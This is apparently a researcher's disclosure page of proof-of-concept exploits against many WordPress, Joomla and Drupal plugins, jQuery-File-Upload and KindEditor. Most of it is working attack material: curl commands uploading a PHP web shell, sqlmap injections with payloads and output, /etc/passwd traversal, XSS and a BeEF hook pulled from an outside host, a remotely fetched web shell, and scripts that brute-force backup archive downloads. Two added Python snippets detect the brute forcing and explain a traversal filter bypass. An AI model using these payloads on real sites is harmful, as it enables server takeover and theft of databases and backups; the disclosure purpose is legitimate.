Tajer – All In One eCommerce WordPress Premium Class Plugin. You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products.
curl -F "files=@shell.php" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php
File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
Where shell.php is:
<?php $cmd=$_GET['cmd']; system($cmd);?>
Or https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206
Actively being exploited in the wild.
https://github.com/blueimp/jQuery-File-Upload/pull/3514
The author includes a .htaccess under server/php/files that attempts to force the file as a download and change the file extension to .html.
.htaccess with comments removed:
SetHandler default-handler
ForceType application/octet-stream
Header set Content-Disposition attachment
<FilesMatch "(?i)\.(gif|jpe?g|png)$">
ForceType none
Header unset Content-Disposition
</FilesMatch>
Header set X-Content-Type-Options nosniff
Testing this on default versions of Ubuntu and Debian: if I enable AllowOverride All in /etc/apache2/apache2.conf for the directory /var/www, I get an Internal Server Error. The error log states:
Invalid command 'Header', perhaps misspelled or defined by a module not included in the server configuration.
So it seems the default apache configuration is missing mod_headers. https://httpd.apache.org/docs/current/mod/mod_headers.html
root@debian:/etc/apache2/mods-enabled# ln -s ../mods-available/headers.load
root@debian:/etc/apache2/mods-enabled# /etc/init.d/apache2 restart
[ ok ] Restarting apache2 (via systemctl): apache2.service.
http://example.com/jQuery-File-Upload-9.22.0/server/php/files/shell.php?cmd=uptime
Now the above downloads shell.html as the software author intended.
This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date.
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql
Where post_data is:
POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
---
[11:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'
[*] shutting down at 11:50:08
CVE-2018-1002001
http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
This module uses Simple Ajax Uploader and provides a basic uploader panel; for more effect you can add your own custom JavaScript, for example sliding up the edit link when the user's mouse hovers over the avatar.
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
"The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
#!/bin/bash
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CWE-552: Files or Directories Accessible to External Parties
#CVE-ID: CVE-2017-2551
#Google Dork: inurl:wp-content/uploads/backwpup
#Add banner about vulnerability
KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
#Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day
MONTH=09
DAY=07
YEAR=2017
Z=0
echo "[+] Scanning website for available backups:"
for y in `seq -w 0 23`; do
    for x in `seq -w 0 59`; do
        # 86400 seconds in a day, so this is the percentage of the day scanned so far
        Y=`echo "scale=2;($Z/86400)*100"|bc`;
        # carriage return redraws the progress line in place
        echo -ne "\r$CWPATH $Y%"
        for z in `seq -w 0 59`; do
            Z=$(( $Z + 1 ));
            CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
            RESULT=`curl -s --head $CWPATH|grep 200`;
            if [ -n "$RESULT" ]; then
                echo ""
                echo "[+] Location $CWPATH Found";
                echo "[+] Received $RESULT";
                echo "Downloading......";
                # wget $CWPATH
                exit;
            fi;
        done
    done
done
echo "Completed."
Google Dork: inurl:wp-content/uploads/backwpup
Easy Joomla Backup creates 'old-school' backups without any frills.
#!/bin/bash
#Larry W. Cashdollar, @_larry0 9/7/2017
#Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
#https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
MONTH=09
DAY=07
YEAR=2017
Z=0
#May need to set DOMAIN to $1 (the target) depending on how Joomla is configured; the archive name starts with the site's domain.
DOMAIN=192.168.0.163
echo "Scanning website for available backups:"
for y in `seq -w 0 23`; do
for x in `seq -w 0 59`; do
# 24*60*60 = 86400 second-granularity file names per day
Y=`echo "scale=2;($Z/86400)*100"|bc`;
# \r rewinds to the start of the line so the progress counter overwrites itself
echo -ne "\r$CPATH $Y%"
for z in `seq -w 0 59`; do
Z=$(( $Z + 1 ));
CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo ""
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
wget $CPATH
fi;
done
done
done
echo "Completed."
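The two scripts above work because both plugins name their archives with a predictable key and a second-granularity timestamp, so a day's worth of candidates is only 86400 HEAD requests. The following detection snippet is an added example, not part of either advisory: it parses combined-format web server access log lines and flags a client that sends a burst of HEAD requests for BackWPup or Easy Joomla Backup archive paths. The log lines at the bottom are constructed for the example; the IPs, paths and threshold are assumptions.

```python
"""Spot backup-archive brute forcing of the kind the two scripts above perform.

Added example: parses combined-format access log lines (constructed below) and flags
clients that probe BackWPup / Easy Joomla Backup archive names in bursts."""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# The archive names the scripts guess: per-site key (WordPress) or domain (Joomla) plus a timestamp.
BACKUP_RE = re.compile(
    r'/wp-content/uploads/.*/backwpup_[^/]+\.zip$'
    r'|/administrator/components/com_easyjoomlabackup/backups/[^/]+\.zip$'
)

def parse_line(line):
    """Return the parsed fields, or None for a line that is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return rec

def find_backup_bruteforce(lines, threshold=5, window_seconds=60):
    """Map client IP -> largest number of backup-archive HEAD probes inside any
    window_seconds span, for clients whose burst reaches threshold. The scripts
    above issue several such probes per second, so a low threshold is enough."""
    probes = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec['method'] == 'HEAD' and BACKUP_RE.search(rec['path']):
            probes[rec['ip']].append(rec['ts'])
    flagged = {}
    for ip, stamps in probes.items():
        stamps.sort()
        lo, best = 0, 0
        for hi in range(len(stamps)):          # sliding window over sorted timestamps
            while (stamps[hi] - stamps[lo]).total_seconds() > window_seconds:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample: one client walking the timestamp space, one unrelated client.
SAMPLE_LOG = [
    f'203.0.113.5 - - [07/Sep/2017:00:00:{s:02d} +0000] "HEAD /wp-content/uploads/2017/09/'
    f'backwpup_abc12301_2017-09-07_00-00-{s:02d}.zip HTTP/1.1" 404 -'
    for s in range(6)
] + [
    '198.51.100.7 - - [07/Sep/2017:00:00:03 +0000] "GET /index.php HTTP/1.1" 200 5123',
    '198.51.100.7 - - [07/Sep/2017:00:00:04 +0000] "HEAD /administrator/components/'
    'com_easyjoomlabackup/backups/example.com_2017-09-07_00-00-04.zip HTTP/1.1" 404 -',
]

if __name__ == '__main__':
    print(find_backup_bruteforce(SAMPLE_LOG))   # {'203.0.113.5': 6}
```

The same logic applies to any backup plugin whose file names are derived from public or guessable values; the fix on the application side is a name with a random component that is not derivable from the request, stored outside the web root.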
Transforms word press into a gallery, wallpapers website, you name it.
$ sqlmap --load-cookies=./cookie -u 'http://example.com/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=*' --level 4 --risk 3 --dbms mysql
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2556 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE WHEN (4165=4165) THEN SLEEP(5) ELSE 4165 END)
---
[13:16:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[13:16:53] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 13:16:53
A simple WordPress plugin that generates a responsive contact form on your website or blog
$ sqlmap -u 'http://example.com/wp-admin/admin.php?page=rk_user_lists&info=del&did=*' --load-cookies=./cookie.txt --level=2 --risk=1 --dbms=mysql
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 318 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wp-admin/admin.php?page=rk_user_lists&info=del&did=(CASE WHEN (6363=6363) THEN SLEEP(5) ELSE 6363 END)
---
[10:57:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[10:57:22] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 10:57:22
Event Espresso Lite – Event Management and Registration System
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=*' --load-cookies=./cookie.txt --level=2 --risk=2 --dbms=mysql
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 364 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=(CASE WHEN (6856=6856) THEN SLEEP(5) ELSE 6856 END)
---
[14:53:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:53:44] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 14:53:44
This plugin used for add edit delete and listing module at admin side.
$ sqlmap -u 'http://example.com/wp-admin/admin.php?page=member_add&act=upd&id=*' --load-cookies=./cookie.txt --level=2 --risk=2 --dbms=mysql
sqlmap identified the following injection point(s) with a total of 339 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wp-admin/admin.php?page=member_add&act=upd&id=(CASE WHEN (1410=1410) THEN SLEEP(5) ELSE 1410 END)
---
[21:59:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[21:59:47] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 21:59:47
KindEditor is a lightweight, Open Source(LGPL), cross browser, web based WYSIWYG HTML editor. KindEditor has the ability to convert standard text areas to rich text editing.
A single multipart POST to kindeditor/php/upload_json.php?dir=file whose uploaded file is named test.html is all that is required to exploit this vulnerability; the upload handler keeps the client-supplied extension, so the stored file is served as HTML:
$ curl -F "imgFile=@test.html" http://example.com/kindeditor/php/upload_json.php?dir=file
{"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"}
Easy Team Manager helps you to create team members with their short descriptions, social profiles link with smooth hover effects.
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*' --load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql
[08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN (3623=3623) THEN SLEEP(5) ELSE 3623 END)
Type: UNION query
Title: MySQL UNION query (84) - 5 columns
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION ALL SELECT 84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84#
---
[08:39:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 08:39:15
The Surveys WordPress plugin lets you add surveys to your blog. You can let the visitors take surveys and see the result from the admin side.
$ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/edit.php?page=surveys%2Fsurvey_form.php&survey=*&action=edit' --dbms mysql --level 1 --risk 1 --load-cookies=./cookies.txt
[22:45:22] [INFO] URI parameter '#1*' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1913 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=(SELECT 8079 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(8079=8079,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&action=edit
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=(CASE WHEN (5824=5824) THEN SLEEP(5) ELSE 5824 END)&action=edit
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=-3195 UNION ALL SELECT 1509,CONCAT(0x7162767171,0x49776a5a4456614e5446634579746a735757586f66776e5145566a776c45797256735a4d476f7170,0x71706b7171),1509#&action=edit
---
[22:45:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[22:45:25] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.169'
[*] shutting down at 22:45:25
$ sqlmap -u 'http://example.com/wordpress/wp-admin/edit.php?page=surveys%2Fquestion.php&survey=*' --dbms mysql --level 3 --risk 3 --load-cookies=./cookies.txt
[14:12:16] [INFO] URI parameter '#1*' is 'Generic UNION query (random number) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1252 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=surveys/question.php&survey=(SELECT * FROM (SELECT(SLEEP(5)))rwrG)
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=surveys/question.php&survey=-3214 UNION ALL SELECT CONCAT(0x716b787671,0x5464416c58704b4b44675145455a565a61594371676143554e705851457371584b75427a5641666d,0x7178627871),7176,7176-- yWXG
---
[14:12:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:12:18] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 14:12:18
Use this plugin if you want to use your blog as an event management tool.
$ sqlmap -u 'http://example.com/wordpress/wp-admin/edit.php?page=eventr%2Fattendees.php&event=*' --dbms mysql --level 3 --risk 3 --load-cookies=./cookies.txt
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1250 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=eventr/attendees.php&event=(SELECT * FROM (SELECT(SLEEP(5)))qppS)
Type: UNION query
Title: Generic UNION query (random number) - 6 columns
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=eventr/attendees.php&event=-2450 UNION ALL SELECT CONCAT(0x716a7a6a71,0x566d4a744c4353656f664d75435376426a736e4d7056476e4d536a465169736e654b4252777a7161,0x716a766271),9012,9012,9012,9012,9012-- pgAi
---
[20:38:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[20:38:00] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 20:38:00
$ sqlmap -u 'http://example.com/wordpress/wp-admin/edit.php?page=eventr%2Fevent_form.php&event=*&action=edit' --dbms mysql --level 3 --risk 3 --load-cookies=./cookies.txt
sqlmap identified the following injection point(s) with a total of 1476 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=eventr/event_form.php&event=(CASE WHEN (9111=9111) THEN SLEEP(5) ELSE 9111 END)&action=edit
---
[06:58:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[06:58:46] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 06:58:46
Gift Certificate Creator WordPress plugin allows you to manage gift certificates on your website. In a convenient front-end UI provided by this plugin, your site visitors can enter the amount and user details. On form submission, the user details will be sent to the administrator. Also, the administrator can view the list of all the certificate requests.
$ curl "http://example/index.php/2017/05/16/gift-certificates/?cert_amount=50&user_name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&receip_name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&cc_sec_code=no%40me.net&receip_address=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&action=Submit"
Inject a BeEF hook even.
Backup flickr’s picture which in page/post External links to flickr’s picture.
$ curl http://example.com/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php -d "url=http://myhost/shell.php"
Where shell.php, served from a host you control, is PHP that prints out the web shell source. The plugin fetches the URL and stores whatever the response body is, so the remote script must emit PHP code rather than execute it; something like:
<?php echo "<?php\n\$cmd=\$_GET['cmd'];\nsystem(\$cmd);\n?>\n"; ?>
Upon exploitation your shell is in: http://example.com/wp-content/uploads/flickr_backup/shell.php
Image Gallery with Slideshow is a full integrated Image Gallery and Slideshow plugin for WordPress.
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=*' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.0.169:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=(CASE WHEN (2912=2912) THEN SLEEP(5) ELSE 2912 END)
---
[14:28:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:28:20] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 14:28:20
$ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=*&gid=1' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
sqlmap identified the following injection point(s) with a total of 337 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=(CASE WHEN (4482=4482) THEN SLEEP(5) ELSE 4482 END)&gid=1
---
[22:07:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[22:07:00] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
40k downloads.
Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' --data 'action=delete&recordId=*' --dbms mysql --level 3 --risk 3
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: action=delete&recordId=(SELECT * FROM (SELECT(SLEEP(5)))uxVZ)
---
[02:10:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:10:51] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 02:10:51
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/updateDB.php' --data 'action=delete_media&recordId=*' --dbms mysql --level 3 --risk 3
sqlmap identified the following injection point(s) with a total of 1411 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: action=delete_media&recordId=(SELECT * FROM (SELECT(SLEEP(5)))ENgw)
---
[02:34:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:34:49] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
[*] shutting down at 02:34:49
Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.
$ curl "http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd"
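The ..././ sequence in the payload above is the usual signature of a filter that deletes the literal string "../" once: strip the inner "../" from "..././" and what remains is "../" again. The snippet below is an added example, not the plugin's code; the one-pass strip it models is an assumption made from the shape of the payload, since the plugin's real filter is not shown on this page. The confined_path() check is the replacement a practitioner would want: judge the normalised final path, not a substring.

```python
"""Why '..././' walks through a one-pass '../' strip, and a check that confines the result.

Added example, not the plugin's code. naive_sanitize() is a hypothetical reconstruction of
the filter the payload above defeats."""
import posixpath

def naive_sanitize(name):
    """Hypothetical filter: delete the literal '../' once, left to right.
    '..././' loses its inner '../' and collapses to exactly '../' again."""
    return name.replace('../', '')

def confined_path(base_dir, user_name):
    """Resolve user_name under base_dir and return it only if it stays inside base_dir.
    Normalising first means doubled, nested or leading-slash traversal is judged on the
    final path; a production check should also realpath() both sides to defeat symlinks."""
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_name.lstrip('/')))
    if candidate == base or not candidate.startswith(base + '/'):
        return None
    return candidate

# The exact download_file value from the PoC above.
PAYLOAD = '..././..././..././..././..././..././..././..././etc/passwd'

if __name__ == '__main__':
    print(naive_sanitize(PAYLOAD))                                      # ../../../../../../../../etc/passwd
    print(confined_path('/var/www/uploads', naive_sanitize(PAYLOAD)))  # None
    print(confined_path('/var/www/uploads', 'docs/lesson1.pdf'))       # /var/www/uploads/docs/lesson1.pdf
```

Run as-is it prints the three lines in the comments. Note that the raw payload (before any stripping) normalises to a harmless path full of literal "..." directory names, which is why the bypass needs the filter to run first; the allowlist check rejects or accepts on the resolved path either way.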
Track the details of the users downloading the pdf files from wordpress site.
$ curl --data "email=\"><script>alert(1);</script>" http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
{"email":"\\\"><script>alert(1);<\/script>","time":"2017-03-09 00:54:06","ip":"example.com","contactId":10577}
Or better yet, inject a BeEF hook:
$ curl --data 'email="><script src=http://BeEF_Host:3000/hook.js></script>' http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
I imagine you could get RCE similar to some exploits targeting the WordPress REST API content injection vulnerability Marc-Alexandre Montpas discovered.
Track the details of the users downloading the pdf files from wordpress site.
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*' --dbms mysql --level 3 --risk 3
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END)
---
[10:14:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[10:14:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 14 times
[10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*' --dbms mysql --risk 1 --level 3
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
---
[11:53:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
“Mobile App Plugin iPhone & Android Make your WordPress website to a Mobile app & mobile website”
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/wp2android-turn-wp-site-into-android-app/server/images.php"
"Make your WordPress website mobile-friendly app (Ready for Google Play & Appstore) with just a few clicks."
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/webapp-builder/server/images.php"
“Convert your WordPress site into native mobile apps."
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php"
“Convert your WordPress site into native mobile apps”
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php"
